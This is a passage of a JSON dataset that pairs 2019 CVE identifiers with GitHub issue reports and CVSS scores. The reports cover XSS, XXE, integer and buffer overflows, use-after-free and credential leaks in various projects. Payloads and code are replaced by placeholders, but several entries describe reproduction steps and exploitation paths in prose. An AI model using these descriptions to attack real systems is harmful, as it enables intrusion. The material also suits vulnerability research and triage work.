  40696. "Repo_new": "proftpd/proftpd",
  40697. "Issue_Created_At": "2019-11-04T16:07:44Z",
  40698. "description": "APITAG (nullptr dereference NUMBERTAG with CRLs in mod_tls of APITAG NUMBERTAG For tracking purposes (this problem is fixed in NUMBERTAG This is the NUMBERTAG st of NUMBERTAG bugs in the APITAG function. It's a direct nullptr dereference: variable initialized to NULL, then dereferenced. I fixed it on my side, then I noticed that it had been fixed upstream in NUMBERTAG From the NUMBERTAG branches diff: CODETAG I'd have expected this kind of issues to be caught by static analysis. Additionally, on my side, I used the following change: APITAG FWIW NUMBERTAG years ago, stunnel got rid of custom CRL handling code and started relying on APITAG built in handling instead. That was between NUMBERTAG and NUMBERTAG compare src/verify.c from FILETAG and FILETAG . My colleagues hit this crash in the summer of NUMBERTAG when dealing with TLS CRLs using APITAG NUMBERTAG s APITAG NUMBERTAG e package against APITAG NUMBERTAG and then I was tasked to debug the issue. I quickly reported the issues privately, but APITAG TLS CRL handling remains broken on all branches more than a year later... I'm aware that TLS CRLs are highly unpopular, and that only system administrators are supposed to define them, but clearly, low profile responsible disclosure didn't work here :) Public reports, and CVE ID assignments (for which I'll use this issue as reference), piling onto the recent higher risk issue NUMBERTAG CVETAG ) and older vulnerabilities should help the downstream propagation of all fixes, at least if any downstream provides security support for APITAG",
  40699. "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:H",
  40700. "severity": "HIGH",
  40701. "baseScore": 7.5,
  40702. "impactScore": 3.6,
  40703. "exploitabilityScore": 3.9
  40704. },
  40705. {
  40706. "CVE_ID": "CVE-2019-19306",
  40707. "Issue_Url_old": "https://github.com/cybersecurityworks/Disclosed/issues/16",
  40708. "Issue_Url_new": "https://github.com/cybersecurityworks/disclosed/issues/16",
  40709. "Repo_new": "cybersecurityworks/disclosed",
  40710. "Issue_Created_At": "2019-10-16T11:06:22Z",
  40711. "description": "ZOHO CRM Lead Magnet version NUMBERTAG Details: ZOHO CRM Lead Magnet version NUMBERTAG Bug Report Bug Name: Reflected Cross Site Scripting (XSS) in APITAG Plugin Product Name: APITAG Server: (ZOHO CRM Lead Magnet version NUMBERTAG ersion NUMBERTAG Last Updated NUMBERTAG Homepage: URLTAG Severity: High Status: Fixed Exploitation Requires Authentication?: yes Vulnerable URL: URLTAG Vulnerable Variable: APITAG & APITAG & APITAG APITAG Description: A cross site scripting (XSS) attack can cause arbitrary code (java script) to run in a user\u2019s browser while the browser is connected to a trusted web site. The application targets your application\u2019s users and not the application itself, but it uses your application as the vehicle for the attack. XSS payload is executing when the user loads an create lead form page created in APITAG Zoho CRM Lead Magnet Version NUMBERTAG APITAG Proof of concept: (POC) APITAG NUMBERTAG APITAG By exploiting a Cross site scripting vulnerability an attacker easily gain access to user\u2019s session by stealing cookies and also exploit the user browser NUMBERTAG Login to the application NUMBERTAG Install Zoho CRM Lead Magnet Plugin [ URLTAG Figure NUMBERTAG Zoho CRM Lead Magnet NUMBERTAG Configure the APITAG client id APITAG and APITAG secret key APITAG Figure NUMBERTAG client key and secret id are filled in Authenticating Zoho CRM Plugin NUMBERTAG Click on APITAG New Form APITAG button and fill the values and click on APITAG APITAG button Figure NUMBERTAG new form in Zoho CRM Plugin NUMBERTAG Add the payload APITAG APITAG APITAG to the vulnerable parameters by intercepting the request in a proxy tool. Figure NUMBERTAG Request with XSS payload sent to the server Figure NUMBERTAG Request and response captured in the proxy NUMBERTAG Injected XSS payload is successfully executed when the user visits or reloads the page Figure NUMBERTAG The APITAG is successfully executed in the victim browser context Figure NUMBERTAG The APITAG application running on version NUMBERTAG Figure NUMBERTAG The APITAG APITAG CRM Lead Magnet plugin Version NUMBERTAG APITAG Figure NUMBERTAG The default cross site scripting mitigation setting in wp.config file to prevent cross site scripting attacks. APITAG Steps APITAG NUMBERTAG Logon into APITAG application in localhost NUMBERTAG Access the vulnerable GET Request URL[ URLTAG with XSS payload inserted into the vulnerable variable NUMBERTAG SS will get executed in the user machine once the user clicks on the given vulnerable link. APITAG APITAG NUMBERTAG Discovered in APITAG Product NUMBERTAG Reported to EMAILTAG rg NUMBERTAG Got instant response from APITAG plugin team( EMAILTAG rg) acknowledging the Vulnerability NUMBERTAG Got mail confirming that the issue is existed and fixed. APITAG by: APITAG Saran Baskar from APITAG Cyber Security Works Pvt Ltd APITAG",
  40712. "vectorString": "CVSS:3.1/AV:N/AC:L/PR:L/UI:R/S:C/C:L/I:L/A:N",
  40713. "severity": "MEDIUM",
  40714. "baseScore": 5.4,
  40715. "impactScore": 2.7,
  40716. "exploitabilityScore": 2.3
  40717. },
  40718. {
  40719. "CVE_ID": "CVE-2019-19307",
  40720. "Issue_Url_old": "https://github.com/cesanta/mongoose/issues/1055",
  40721. "Issue_Url_new": "https://github.com/cesanta/mongoose/issues/1055",
  40722. "Repo_new": "cesanta/mongoose",
  40723. "Issue_Created_At": "2019-10-02T06:55:52Z",
  40724. "description": "Integer overflow when decode mqtt variable length. The problem occurs in function APITAG , when the broker proceeds a message , first it decodes a sequence bytes from the NUMBERTAG nd to get the length of data and then determine the end of data by sum up p and len : ERRORTAG However, if len is too large, the value of end become less than value of p . And the root cause here is this line: APITAG Using modern gcc compiler on linux, when the broker casts down to data type of len ( which is APITAG ), the value will be auto cast to NUMBERTAG bit. ERRORTAG and the result is: APITAG Exploit concept of NUMBERTAG s complement, we can control the value of end from APITAG to APITAG . Impact: Remote APITAG if value of end equals to APITAG , then the current message won't be removed from IO buffer, which leads to an infinite loop ( for example: the broker is always busy if we send this payload APITAG , tested on the latest version of Mongoose on Ubuntu ) Potential out of bound access: because the value of end may be less than APITAG , it can be exploited as out of bound read/write in further developments",
  40725. "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H",
  40726. "severity": "CRITICAL",
  40727. "baseScore": 9.8,
  40728. "impactScore": 5.9,
  40729. "exploitabilityScore": 3.9
  40730. },
  40731. {
  40732. "CVE_ID": "CVE-2019-19316",
  40733. "Issue_Url_old": "https://github.com/hashicorp/terraform/issues/23493",
  40734. "Issue_Url_new": "https://github.com/hashicorp/terraform/issues/23493",
  40735. "Repo_new": "hashicorp/terraform",
  40736. "Issue_Created_At": "2019-11-25T21:15:04Z",
  40737. "description": "State transmitted in cleartext for azurerm backend with SAS token. APITAG Terraform Version APITAG CODETAG Expected Behavior APITAG Terraform should transfer state over HTTPS Actual Behavior APITAG Terraform transmits the state over HTTP Steps to Reproduce APITAG NUMBERTAG Create a SAS token for the storage account with either the spr set to APITAG or not present NUMBERTAG Run a plan using the SAS token for authenticating Additional Context APITAG This was originally discovered under the azure provider as URLTAG and is related to URLTAG Terraform is still using an older version of the SDK which doesn't have this fix. Workarounds are to set the spr to https or use an access key instead. With the SDK fix, if spr is APITAG , then HTTP is also used instead of HTTPS. References APITAG URLTAG URLTAG",
  40738. "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:N/A:N",
  40739. "severity": "HIGH",
  40740. "baseScore": 7.5,
  40741. "impactScore": 3.6,
  40742. "exploitabilityScore": 3.9
  40743. },
  40744. {
  40745. "CVE_ID": "CVE-2019-19375",
  40746. "Issue_Url_old": "https://github.com/OctopusDeploy/Issues/issues/5998",
  40747. "Issue_Url_new": "https://github.com/octopusdeploy/issues/issues/5998",
  40748. "Repo_new": "octopusdeploy/issues",
  40749. "Issue_Created_At": "2019-11-14T02:15:57Z",
  40750. "description": "Placeholder issue. Details coming soon. Relates to URLTAG",
  40751. "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:L/I:N/A:N",
  40752. "severity": "MEDIUM",
  40753. "baseScore": 5.3,
  40754. "impactScore": 1.4,
  40755. "exploitabilityScore": 3.9
  40756. },
  40757. {
  40758. "CVE_ID": "CVE-2019-19376",
  40759. "Issue_Url_old": "https://github.com/OctopusDeploy/Issues/issues/6005",
  40760. "Issue_Url_new": "https://github.com/octopusdeploy/issues/issues/6005",
  40761. "Repo_new": "octopusdeploy/issues",
  40762. "Issue_Created_At": "2019-11-14T05:14:54Z",
  40763. "description": "Placeholder issue. Details coming soon. Relates to APITAG NUMBERTAG",
  40764. "vectorString": "CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:N/I:N/A:H",
  40765. "severity": "MEDIUM",
  40766. "baseScore": 6.5,
  40767. "impactScore": 3.6,
  40768. "exploitabilityScore": 2.8
  40769. },
  40770. {
  40771. "CVE_ID": "CVE-2019-19507",
  40772. "Issue_Url_old": "https://github.com/manvel-khnkoyan/jpv/issues/6",
  40773. "Issue_Url_new": "https://github.com/manvel-khnkoyan/jpv/issues/6",
  40774. "Repo_new": "manvel-khnkoyan/jpv",
  40775. "Issue_Created_At": "2019-11-28T22:12:05Z",
  40776. "description": "A vulnerability in APITAG We found that a maliciously crafted json can bypass the validation logics of the jpv. The vulnerability is from the following code: jpv leverages the built in constructor of unsafe user input to detect type information. However, a crafted payload can overwrite this builtin attribute to manipulate the validation result. URLTAG Reproduce Script CODETAG",
  40777. "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:L/A:N",
  40778. "severity": "MEDIUM",
  40779. "baseScore": 5.3,
  40780. "impactScore": 1.4,
  40781. "exploitabilityScore": 3.9
  40782. },
  40783. {
  40784. "CVE_ID": "CVE-2019-19588",
  40785. "Issue_Url_old": "https://github.com/kvesteri/validators/issues/86",
  40786. "Issue_Url_new": "https://github.com/python-validators/validators/issues/86",
  40787. "Repo_new": "python-validators/validators",
  40788. "Issue_Created_At": "2018-06-06T23:00:03Z",
  40789. "description": "Text string that causes APITAG to lock at NUMBERTAG CPU usage. The following string makes validators NUMBERTAG get lock at NUMBERTAG CPU forever. APITAG Logs: CODETAG APITAG APITAG never ends. If I go to htop, the python process is at NUMBERTAG CPU) With version NUMBERTAG this doesn't happen. Logs: CODETAG The environment for tests was APITAG Docker image from NUMBERTAG days ago. Temporary fix: uninstall NUMBERTAG and install NUMBERTAG",
  40790. "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:H",
  40791. "severity": "HIGH",
  40792. "baseScore": 7.5,
  40793. "impactScore": 3.6,
  40794. "exploitabilityScore": 3.9
  40795. },
  40796. {
  40797. "CVE_ID": "CVE-2019-19590",
  40798. "Issue_Url_old": "https://github.com/radareorg/radare2/issues/15543",
  40799. "Issue_Url_new": "https://github.com/radareorg/radare2/issues/15543",
  40800. "Repo_new": "radareorg/radare2",
  40801. "Issue_Created_At": "2019-12-04T09:29:34Z",
  40802. "description": "Integer Overflow in APITAG at PATHTAG Work environment | Questions | Answers | | | PATHTAG (mandatory) | Ubuntu NUMBERTAG File format of the file you reverse (mandatory) | None | Architecture/bits of the file (mandatory) | None | r2 v full output, not truncated (mandatory) | radare NUMBERTAG git NUMBERTAG linu NUMBERTAG APITAG NUMBERTAG gcb NUMBERTAG b5e8f commit: APITAG build NUMBERTAG Expected behavior CODETAG Actual behavior APITAG Steps to reproduce the behavior Follow the command I list above Additional Logs, screenshots, source code, configuration dump, ... In r_asm_massemble URLTAG at FILETAG , when r2 tries to assemble a long input with too many tokens , new_token_size URLTAG will be integer overflowed to zero. Later, realloc(tokens, sizeof (char ) new_tokens_size) URLTAG will actually free tokens , leading a Use After Free . More serious, the freed tokens can be filled with arbitrary data, which can be used to exploit to RCE. The bug code is listed below, a quick fix will be to add a upper boundary check for APITAG CODETAG",
  40803. "vectorString": "CVSS:3.1/AV:L/AC:L/PR:N/UI:R/S:U/C:H/I:H/A:H",
  40804. "severity": "HIGH",
  40805. "baseScore": 7.8,
  40806. "impactScore": 5.9,
  40807. "exploitabilityScore": 1.8
  40808. },
  40809. {
  40810. "CVE_ID": "CVE-2019-19601",
  40811. "Issue_Url_old": "https://github.com/pkubowicz/opendetex/issues/60",
  40812. "Issue_Url_new": "https://github.com/pkubowicz/opendetex/issues/60",
  40813. "Repo_new": "pkubowicz/opendetex",
  40814. "Issue_Created_At": "2019-12-05T08:11:30Z",
  40815. "description": "Buffer overflow in the APITAG function. Hi, While fuzzing APITAG with Honggfuzz, I found a buffer overflow in the APITAG function, in detex.l. Attaching a reproducer (gzipped so APITAG accepts it): FILETAG Issue can be reproduced by running: APITAG ERRORTAG",
  40816. "vectorString": "CVSS:3.1/AV:L/AC:L/PR:N/UI:R/S:U/C:H/I:H/A:H",
  40817. "severity": "HIGH",
  40818. "baseScore": 7.8,
  40819. "impactScore": 5.9,
  40820. "exploitabilityScore": 1.8
  40821. },
  40822. {
  40823. "CVE_ID": "CVE-2019-19602",
  40824. "Issue_Url_old": "https://github.com/golang/go/issues/35777",
  40825. "Issue_Url_new": "https://github.com/golang/go/issues/35777",
  40826. "Repo_new": "golang/go",
  40827. "Issue_Created_At": "2019-11-22T15:24:36Z",
  40828. "description": "runtime: memory corruption on Linu NUMBERTAG from async preemption. We've had several reports of memory corruption on Linu NUMBERTAG or later) kernels from people running tip since asynchronous preemption was committed. This is a super bug to track these issues. I suspect they all have one root cause. Typically these are \"runtime error: invalid memory address or nil pointer dereference\" or \"runtime: unexpected return pc\" panics. They can also appear as self detected data corruption. If you encounter a crash that could be random memory corruption, are running Linu NUMBERTAG or later, and are running a recent tip Go (after commit APITAG please file a new issue and add a comment here. If you can reproduce it, please try setting \"GODEBUG=asyncpreemptoff NUMBERTAG in your environment and seeing if you can still reproduce it. Duplicate issues (I'll edit this comment to keep this up to date): runtime: corrupt binary export data seen after signal preemption CL NUMBERTAG Corruption in file version header observed by vet. Medium reproducible. Strong leads. cmd/compile: panic during early copyelim crash NUMBERTAG Invalid memory address in PATHTAG Not reproducible. Nothing obvious in stack trace. Haven't dug into assembly.",
  40829. "vectorString": "CVSS:3.1/AV:L/AC:L/PR:L/UI:N/S:U/C:H/I:N/A:L",
  40830. "severity": "MEDIUM",
  40831. "baseScore": 6.1,
  40832. "impactScore": 4.2,
  40833. "exploitabilityScore": 1.8
  40834. },
  40835. {
  40836. "CVE_ID": "CVE-2019-19624",
  40837. "Issue_Url_old": "https://github.com/opencv/opencv/issues/14554",
  40838. "Issue_Url_new": "https://github.com/opencv/opencv/issues/14554",
  40839. "Repo_new": "opencv/opencv",
  40840. "Issue_Created_At": "2019-05-14T13:24:09Z",
  40841. "description": "APITAG segfault for small images. System information (version) APITAG NUMBERTAG Operating System / Platform => Windows NUMBERTAG Bit Compiler => Visual Studio NUMBERTAG APITAG NUMBERTAG Operating System / Platform => Any Compiler => Any Detailed description APITAG segfaults for small images. The problem is in the calculation of pyramid scales. Variable APITAG is assumed to be greater or equal than APITAG in APITAG / APITAG functions, while this is not true for small images. Actually, APITAG can be even less than NUMBERTAG If APITAG is less than APITAG , loop body in APITAG / APITAG functions doesn't execute and Ux , Uy arrays are accessed out of bounds URLTAG . As a solution, the finest level may be selected dependent on the coarsest level as in DIS author's code URLTAG instead of constant for every preset, while coarsest level may be limited to be greater or equal than zero. Steps to reproduce CODETAG",
  40842. "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:L/I:N/A:L",
  40843. "severity": "MEDIUM",
  40844. "baseScore": 6.5,
  40845. "impactScore": 2.5,
  40846. "exploitabilityScore": 3.9
  40847. },
  40848. {
  40849. "CVE_ID": "CVE-2019-19625",
  40850. "Issue_Url_old": "https://github.com/aliasrobotics/RVD/issues/922",
  40851. "Issue_Url_new": "https://github.com/aliasrobotics/rvd/issues/922",
  40852. "Repo_new": "aliasrobotics/rvd",
  40853. "Issue_Created_At": "2019-12-05T21:44:23Z",
  40854. "description": "SROS2 leaks node information. ERRORTAG",
  40855. "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:L/I:N/A:N",
  40856. "severity": "MEDIUM",
  40857. "baseScore": 5.3,
  40858. "impactScore": 1.4,
  40859. "exploitabilityScore": 3.9
  40860. },
  40861. {
  40862. "CVE_ID": "CVE-2019-19627",
  40863. "Issue_Url_old": "https://github.com/ros2/sros2/issues/172",
  40864. "Issue_Url_new": "https://github.com/ros2/sros2/issues/172",
  40865. "Repo_new": "ros2/sros2",
  40866. "Issue_Created_At": "2019-12-06T10:08:16Z",
  40867. "description": "SROS2 leaks node information, regardless of rtps_protection_kind setup . Bug report Connected to URLTAG After this patch one wold expect that node information isn't disclosed anymore but testing led to a different result. I'm not that experienced with APITAG at this point so I might be missing something? Ping to MENTIONTAG and MENTIONTAG Operating System: OS NUMBERTAG Ubuntu NUMBERTAG Installation type: from sources Version or commit hash: dashing eloquent master ( URLTAG DDS implementation: APITAG Client library (if applicable): rclpy Steps to reproduce issue Change defaults set APITAG to encrypt and recreate keys. URLTAG Expected behavior Communications are encrypted for third parties (without credentials) in the network, node information isn't disclosed. Actual behavior Node information is still disclosed. Even after applying URLTAG , rebuilding APITAG and regenerating the keys. Additional information Connected to URLTAG",
  40868. "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:L/I:N/A:N",
  40869. "severity": "MEDIUM",
  40870. "baseScore": 5.3,
  40871. "impactScore": 1.4,
  40872. "exploitabilityScore": 3.9
  40873. },
  40874. {
  40875. "CVE_ID": "CVE-2019-19630",
  40876. "Issue_Url_old": "https://github.com/michaelrsweet/htmldoc/issues/370",
  40877. "Issue_Url_new": "https://github.com/michaelrsweet/htmldoc/issues/370",
  40878. "Repo_new": "michaelrsweet/htmldoc",
  40879. "Issue_Created_At": "2019-12-06T17:57:51Z",
  40880. "description": "Stack based buffer overflow in the APITAG function. Hi, While fuzzing htmldoc with Honggfuzz, I found a stack based buffer overflow in the APITAG function, in string.c. Attaching a reproducer (gzipped so APITAG accepts it): FILETAG Issue can be reproduced by running: APITAG ERRORTAG",
  40881. "vectorString": "CVSS:3.1/AV:L/AC:L/PR:N/UI:R/S:U/C:H/I:H/A:H",
  40882. "severity": "HIGH",
  40883. "baseScore": 7.8,
  40884. "impactScore": 5.9,
  40885. "exploitabilityScore": 1.8
  40886. },
  40887. {
  40888. "CVE_ID": "CVE-2019-19635",
  40889. "Issue_Url_old": "https://github.com/saitoha/libsixel/issues/103",
  40890. "Issue_Url_new": "https://github.com/saitoha/libsixel/issues/103",
  40891. "Repo_new": "saitoha/libsixel",
  40892. "Issue_Created_At": "2019-12-02T10:49:48Z",
  40893. "description": "A heap buffer overflow in function sixel_decode_raw_impl at APITAG NUMBERTAG due to integer overflow. libsixel version libsixel NUMBERTAG description txt None download link None others please send email to EMAILTAG if you have any questions. si EMAILTAG NUMBERTAG heap buffer overflow description An issue was discovered in libsixel NUMBERTAG There is a/an heap buffer overflow in function sixel_decode_raw_impl at APITAG NUMBERTAG commandline img2sixel APITAG o /dev/null source CODETAG bug report ERRORTAG others from fuzz project pwd libsixel img2sixel NUMBERTAG crash name pwd libsixel img2sixel NUMBERTAG pnm Auto generated by pyspider at NUMBERTAG please send email to EMAILTAG if you have any questions.",
  40894. "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H",
  40895. "severity": "CRITICAL",
  40896. "baseScore": 9.8,
  40897. "impactScore": 5.9,
  40898. "exploitabilityScore": 3.9
  40899. },
  40900. {
  40901. "CVE_ID": "CVE-2019-19636",
  40902. "Issue_Url_old": "https://github.com/saitoha/libsixel/issues/104",
  40903. "Issue_Url_new": "https://github.com/saitoha/libsixel/issues/104",
  40904. "Repo_new": "saitoha/libsixel",
  40905. "Issue_Created_At": "2019-12-02T10:51:14Z",
  40906. "description": "An integer overflow in function sixel_encode_body at APITAG NUMBERTAG libsixel version libsixel NUMBERTAG description txt None download link None others please send email to EMAILTAG if you have any questions. EMAILTAG NUMBERTAG SEGV_UNKNOW description An issue was discovered in libsixel NUMBERTAG There is an integer overflow in function sixel_encode_body at APITAG NUMBERTAG commandline img2sixel APITAG o /dev/null source CODETAG bug report ERRORTAG others from fuzz project pwd libsixel img2sixel NUMBERTAG crash name pwd libsixel img2sixel NUMBERTAG pnm Auto generated by pyspider at NUMBERTAG please send email to EMAILTAG if you have any questions.",
  40907. "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H",
  40908. "severity": "CRITICAL",
  40909. "baseScore": 9.8,
  40910. "impactScore": 5.9,
  40911. "exploitabilityScore": 3.9
  40912. },
  40913. {
  40914. "CVE_ID": "CVE-2019-19637",
  40915. "Issue_Url_old": "https://github.com/saitoha/libsixel/issues/105",
  40916. "Issue_Url_new": "https://github.com/saitoha/libsixel/issues/105",
  40917. "Repo_new": "saitoha/libsixel",
  40918. "Issue_Created_At": "2019-12-02T10:52:00Z",
  40919. "description": "An integer overflow in function sixel_decode_raw_impl at APITAG libsixel version libsixel NUMBERTAG description txt None download link None others please send email to EMAILTAG if you have any questions. si EMAILTAG NUMBERTAG integer_overflow description An issue was discovered in libsixel NUMBERTAG There is an integer overflow in function sixel_decode_raw_impl at APITAG commandline img2sixel APITAG o /dev/null source In a while loop, it do not check if integer overflow is in APITAG CODETAG",
  40920. "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H",
  40921. "severity": "CRITICAL",
  40922. "baseScore": 9.8,
  40923. "impactScore": 5.9,
  40924. "exploitabilityScore": 3.9
  40925. },
  40926. {
  40927. "CVE_ID": "CVE-2019-19638",
  40928. "Issue_Url_old": "https://github.com/saitoha/libsixel/issues/102",
  40929. "Issue_Url_new": "https://github.com/saitoha/libsixel/issues/102",
  40930. "Repo_new": "saitoha/libsixel",
  40931. "Issue_Created_At": "2019-12-02T10:47:41Z",
  40932. "description": "A heap buffer overflow found in function load_pnm at APITAG NUMBERTAG due to integer overflow. libsixel version libsixel NUMBERTAG description txt None download link None others please send email to EMAILTAG if you have any questions. EMAILTAG NUMBERTAG heap buffer overflow description An issue was discovered in libsixel NUMBERTAG There is a/an heap buffer overflow in function load_pnm at APITAG NUMBERTAG commandline img2sixel APITAG o /dev/null source ERRORTAG bug report ERRORTAG others from fuzz project pwd libsixel img2sixel NUMBERTAG crash name pwd libsixel img2sixel NUMBERTAG pnm Auto generated by pyspider at NUMBERTAG please send email to EMAILTAG if you have any questions.",
  40933. "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H",
  40934. "severity": "CRITICAL",
  40935. "baseScore": 9.8,
  40936. "impactScore": 5.9,
  40937. "exploitabilityScore": 3.9
  40938. },
  40939. {
  40940. "CVE_ID": "CVE-2019-19647",
  40941. "Issue_Url_old": "https://github.com/radareorg/radare2/issues/15545",
  40942. "Issue_Url_new": "https://github.com/radareorg/radare2/issues/15545",
  40943. "Repo_new": "radareorg/radare2",
  40944. "Issue_Created_At": "2019-12-06T07:49:36Z",
  40945. "description": "Lack of Validation Check for APITAG at APITAG . Work environment | Questions | Answers | | | PATHTAG (mandatory) | Ubuntu NUMBERTAG File format of the file you reverse (mandatory) | None | Architecture/bits of the file (mandatory) | None | r2 v full output, not truncated (mandatory) | radare NUMBERTAG git NUMBERTAG linu NUMBERTAG APITAG NUMBERTAG gb7cc NUMBERTAG a commit: APITAG build NUMBERTAG Expected behavior APITAG Actual behavior APITAG Steps to reproduce the behavior Please follow the steps I list above Additional Logs, screenshots, source code, configuration dump, ... At FILETAG , the lack of validation check of variable content URLTAG will cause crash and arbitrary read via craft input. below is the vulnerable code. CODETAG If APITAG tries to open an invalid file, content will be NULL. Later, because skip is the input number, APITAG will cause crash, or arbitrary write via crafted input.",
  40946. "vectorString": "CVSS:3.1/AV:L/AC:L/PR:N/UI:R/S:U/C:H/I:H/A:H",
  40947. "severity": "HIGH",
  40948. "baseScore": 7.8,
  40949. "impactScore": 5.9,
  40950. "exploitabilityScore": 1.8
  40951. },
  40952. {
  40953. "CVE_ID": "CVE-2019-19648",
  40954. "Issue_Url_old": "https://github.com/VirusTotal/yara/issues/1178",
  40955. "Issue_Url_new": "https://github.com/virustotal/yara/issues/1178",
  40956. "Repo_new": "virustotal/yara",
  40957. "Issue_Created_At": "2019-12-08T08:50:29Z",
  40958. "description": "Out of Bounds Memory Access in macho module. In FILETAG , yara doesn't check whether the variable command_size URLTAG is consistent with the command's real size. A crafted macho file will lead an out of bounds memory access later. Following is the bug code. ERRORTAG If the size is NUMBERTAG APITAG , and there is only one command whose size is APITAG . The memory layout of the crafted macho would look like: APITAG Thus, when yara tries to handle the second command here URLTAG , yara will access the address after data URLTAG , causing an out of bounds memory access. This will cause crash or potentials code executions. The poc is attach: ERRORTAG FILETAG",
  40959. "vectorString": "CVSS:3.1/AV:L/AC:L/PR:N/UI:R/S:U/C:H/I:H/A:H",
  40960. "severity": "HIGH",
  40961. "baseScore": 7.8,
  40962. "impactScore": 5.9,
  40963. "exploitabilityScore": 1.8
  40964. },
  40965. {
  40966. "CVE_ID": "CVE-2019-19698",
  40967. "Issue_Url_old": "https://github.com/marc-q/libwav/issues/25",
  40968. "Issue_Url_new": "https://github.com/marc-q/libwav/issues/25",
  40969. "Repo_new": "marc-q/libwav",
  40970. "Issue_Created_At": "2019-10-24T07:14:38Z",
  40971. "description": "SEGV in function wav_content_read in libwav.c. SEGV in function wav_content_read in libwav.c Tested in Ubuntu NUMBERTAG bit I use the FILETAG and the following command: APITAG and get: APITAG I use valgrind to analysis the bug and get the below information: ERRORTAG I use gcc NUMBERTAG and APITAG to build libwav, this FILETAG can cause SEGV signal in function PATHTAG when running the wav_gain in folder tools/wav_gain with the following command: APITAG This is the ASAN information: ERRORTAG",
  40972. "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:U/C:N/I:N/A:H",
  40973. "severity": "MEDIUM",
  40974. "baseScore": 6.5,
  40975. "impactScore": 3.6,
  40976. "exploitabilityScore": 2.8
  40977. },
  40978. {
  40979. "CVE_ID": "CVE-2019-19702",
  40980. "Issue_Url_old": "https://github.com/modoboa/modoboa-dmarc/issues/38",
  40981. "Issue_Url_new": "https://github.com/modoboa/modoboa-dmarc/issues/38",
  40982. "Repo_new": "modoboa/modoboa-dmarc",
  40983. "Issue_Created_At": "2019-11-25T22:32:21Z",
  40984. "description": "XML External Entity (XXE) Injection during import of aggregated report. APITAG APITAG XXE Injection is a type of attack against an application that parses XML input. By default, many XML processors allow specification of an external entity, a URI that is dereferenced and evaluated during XML processing. When an XML document is being parsed, the parser can make a request and include the content at the specified URI inside of the XML document. Attacks can include disclosing local files, which may contain sensitive data such as passwords or private user data, using file: schemes or relative paths in the system identifier. APITAG Steps to reproduce APITAG NUMBERTAG Using the XML file in the Gist URLTAG , run the following to create a zip attachment APITAG Copy and paste the base NUMBERTAG encoding into one of the test reports, for example FILETAG NUMBERTAG Import the aggregated report APITAG This will trigger the XXE injection and populate the database, given that the data fits into the database fields. APITAG Remediation APITAG Use a XML parser with entity expansion disabled. Please refer to this guideline URLTAG .",
  40985. "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:H",
  40986. "severity": "HIGH",
  40987. "baseScore": 7.5,
  40988. "impactScore": 3.6,
  40989. "exploitabilityScore": 3.9
  40990. },
  40991. {
  40992. "CVE_ID": "CVE-2019-19703",
  40993. "Issue_Url_old": "https://github.com/ktorio/ktor/issues/1467",
  40994. "Issue_Url_new": "https://github.com/ktorio/ktor/issues/1467",
  40995. "Repo_new": "ktorio/ktor",
  40996. "Issue_Created_At": "2019-11-29T11:37:32Z",
  40997. "description": "Ktor client resends auth data to redirect location. Ktor Version and Engine Used Ktor HTTP client NUMBERTAG with Apache engine. Describe the bug Enable APITAG for http client and send request with auth data to the host APITAG which redirects to the host APITAG with auth data from host foo . To Reproduce Steps to reproduce the behavior: CODETAG Actual result: Authorization header data is leaked to the host APITAG . Expected behavior The Authorization header from original request to the host foo is cleared before establishing redirect request to the host bar . It's a good security practice. Comment It could be solved by cleaning the Authorization header in the APITAG feature: URLTAG",
  40998. "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:C/C:L/I:L/A:N",
  40999. "severity": "MEDIUM",
  41000. "baseScore": 6.1,
  41001. "impactScore": 2.7,
  41002. "exploitabilityScore": 2.8
  41003. },
  41004. {
  41005. "CVE_ID": "CVE-2019-19720",
  41006. "Issue_Url_old": "https://github.com/marcIhm/yabasic/issues/36",
  41007. "Issue_Url_new": "https://github.com/marcihm/yabasic/issues/36",
  41008. "Repo_new": "marcihm/yabasic",
  41009. "Issue_Created_At": "2019-12-10T13:08:41Z",
  41010. "description": "Heap based buffer overflow in the APITAG function. Hi, While fuzzing yabasic NUMBERTAG with Honggfuzz, I found a heap based buffer overflow in the APITAG function, in flex.c. Attaching a reproducer (gzipped so APITAG accepts it): FILETAG Issue can be reproduced by running: APITAG ERRORTAG",
  41011. "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:U/C:H/I:H/A:H",
  41012. "severity": "HIGH",
  41013. "baseScore": 8.8,
  41014. "impactScore": 5.9,
  41015. "exploitabilityScore": 2.8
  41016. },
  41017. {
  41018. "CVE_ID": "CVE-2019-19725",
  41019. "Issue_Url_old": "https://github.com/sysstat/sysstat/issues/242",
  41020. "Issue_Url_new": "https://github.com/sysstat/sysstat/issues/242",
  41021. "Repo_new": "sysstat/sysstat",
  41022. "Issue_Created_At": "2019-12-09T09:54:32Z",
  41023. "description": "Double free in APITAG When I run a sadf utility with FILETAG , it leads double free bug in APITAG ERRORTAG If skip_extra_struct fails at this line URLTAG , read_stats_from_file falls into format_error: label and try to free buffer here]( URLTAG However buffer has been already freed [before URLTAG , causes double free bug . Thanks",
  41024. "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H",
  41025. "severity": "CRITICAL",
  41026. "baseScore": 9.8,
  41027. "impactScore": 5.9,
  41028. "exploitabilityScore": 3.9
